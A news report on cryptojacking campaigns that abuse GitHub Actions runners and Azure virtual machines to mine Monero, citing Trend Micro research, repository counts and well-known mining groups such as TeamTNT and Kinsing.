There are ongoing attempts by cybercriminals to target cloud services for illegal purposes, as shown by the use of GitHub Actions and Azure virtual machines (VMs) for cloud-based cryptocurrency mining.
“Attackers can abuse the runners or servers provided by GitHub to run an organization’s pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily,” said Trend Micro researcher Magno Logan.
Continuous integration and continuous delivery (CI/CD) platform called GitHub Actions (GHAs) enables users to automate the pipeline for developing, testing, and deploying software. Developers may use the feature to build workflows that test each pull request before adding it to a code repository or publishing merged pull requests to production. The Standard_DS2_v2 virtual machines on Azure, which have two vCPUs and 7GB of RAM, are used to host Linux and Windows runners.
The Japanese business said it found over 550 snippets and over 1,000 repositories exploiting GitHub’s crypto miners to exploit the site. GitHub has been alerted to the problem. In addition, 11 repositories were discovered to have identical variations of a YAML script providing orders to mine Monero coins, all of which used the same wallet, indicating that either a single actor or a group working together is responsible.
“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry,” said Logan. “Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions.”
It is common knowledge that cryptojacking-focused groups breach cloud installations by taking advantage of a security weakness in the target systems, such as an unpatched vulnerability, weak credentials, or a poorly configured cloud implementation. In the world of illicit cryptocurrency mining, some well-known players include 8220, Keksec (also known as Kek Security), Kinsing, Outlaw, and TeamTNT.
In order to best make use of the cloud systems to their benefit, the malware toolkit is also distinguished by the employment of kill scripts to end and remove rival cryptocurrency miners. According to Trend Micro, this is a conflict “fought for control of the victim’s resources.” However, in addition to increasing infrastructure and energy costs, the deployment of crypto miners is also a sign of poor security hygiene because it enables threat actors to weaponize the initial access obtained through a cloud misconfiguration for much more harmful purposes like data exfiltration or ransomware.
According to the company, one distinctive feature of malicious actor groups is that in addition to dealing with a target organization’s security systems and people, they also have to fight with one another for scarce resources. The struggle to seize and maintain control of a victim’s servers is a key factor in the development of these organizations’ tools and tactics, leading them to continuously enhance their capacity to remove rivals from compromised systems while simultaneously resisting their own removal.